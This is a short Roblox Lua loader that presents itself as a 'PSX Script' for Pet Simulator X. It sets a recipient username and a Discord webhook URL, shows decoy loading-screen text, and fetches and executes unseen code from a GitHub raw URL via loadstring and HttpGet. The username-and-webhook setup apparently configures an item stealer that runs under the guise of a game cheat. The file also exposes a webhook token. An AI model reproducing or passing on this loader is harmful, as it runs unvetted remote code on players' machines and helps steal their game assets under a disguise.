```
Username = "Bank1nvited"
WebHook = "https://discord.com/api/webhooks/854171461043617873/LR---rKi1jf1hSgfmuu2voQUNnoF-irhL7M-BxS8Q-307JoOzcHj1T5IwIR1Gm0yMjJJ"

loadingscreen = true -- set this to false and remove _G. stuff to use your own GUI
_G.CustomScriptName = "PSX Script"
_G.Text1 = "Script Loaded..."
_G.Text2 = "Waiting for Script"
_G.Text3 = "Checking Scripts..."
_G.Text4 = "Starting Scripts..."
loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()
```
